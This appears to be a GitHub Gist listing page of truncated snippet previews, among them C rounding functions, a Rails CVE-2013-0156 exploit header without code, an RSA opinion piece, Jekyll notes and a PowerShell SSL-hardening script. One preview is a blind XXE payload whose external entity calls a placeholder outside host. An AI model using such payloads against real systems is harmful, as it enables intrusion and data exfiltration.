We have moved: https://github.com/magnetikonline/linuxmicrosoftievirtualmachines
Due to the popularity of this Gist, and the work in keeping it updated via a Gist, all future updates will take place at the above location. Thanks!
/** round n down to nearest multiple of m */ | |
long roundDown(long n, long m) { | |
return n >= 0 ? (n / m) * m : ((n - m + 1) / m) * m; | |
} | |
/** round n up to nearest multiple of m */ | |
long roundUp(long n, long m) { | |
return n >= 0 ? ((n + m - 1) / m) * m : (n / m) * m; | |
} |
/** | |
* Enable route to __noSuchMethod__ when unknown method calling. | |
* | |
* @param {Object} obj Target object. | |
* @return {Object} | |
*/ | |
function enableMethodMissing(obj) { | |
var functionHandler = createBaseHandler({}); | |
functionHandler.get = function(receiver, name) { |
#!/usr/bin/env ruby | |
# | |
# Proof-of-Concept exploit for Rails Remote Code Execution (CVE-2013-0156) | |
# | |
# ## Advisory | |
# | |
# https://groups.google.com/forum/#!topic/rubyonrails-security/61bkgvnSGTQ/discussion | |
# | |
# ## Caveats | |
# |
We have moved: https://github.com/magnetikonline/linuxmicrosoftievirtualmachines
Due to the popularity of this Gist, and the work in keeping it updated via a Gist, all future updates will take place at the above location. Thanks!
I want to be extremely clear about three things. First, this is my personal opinion – insert full standard disclaimer. Second, this is not a condemnation of everyone at RSA, present and past. I assume most of them are pretty okay, and that the problem is confined to a few specific points in the company. However, “unknown problem people making major decisions at RSA” is a bit unwieldy, so I will just say RSA. Third, I'm not calling for a total boycott on RSA. I work almost literally across the street from them and I don’t want to get beat up by roving gangs of cryptographers at the local Chipotle.
RSA's denial published last night is utter codswallop that denies pretty much everything in the world except the actual allegations put forth by Reuters and hinted at for months by [other sources](http://li
A list of the most common functionalities in Jekyll (Liquid). You can use Jekyll with GitHub Pages, just make sure you are using the proper version.
Running a local server for testing purposes:
-------------------------------------------------------------- | |
Vanilla, used to verify outbound xxe or blind xxe | |
-------------------------------------------------------------- | |
<?xml version="1.0" ?> | |
<!DOCTYPE r [ | |
<!ELEMENT r ANY > | |
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
]> | |
<r>&sp;</r> |
Hi guys! Since I started to write Bluebox-ng I've been tracking the different security projects I found written in Node.js. Now we've published the first stable version we think it's the right moment to speak among us (and, of course, everyone interested in it :).
# Call this from inside a startup task/batch file as shown in the next two lines (minus the '# ') | |
# PowerShell -ExecutionPolicy Unrestricted .\HardenSsl.ps1 >> log-HardenSsl.txt 2>&1 | |
# EXIT /B 0 | |
# Credits: | |
# http://azure.microsoft.com/blog/2014/10/19/how-to-disable-ssl-3-0-in-azure-websites-roles-and-virtual-machines/ | |
# http://lukieb.blogspot.com/2014/11/tightening-up-your-azure-cloud-service.html | |
$nl = [Environment]::NewLine | |
$regkeys = @( |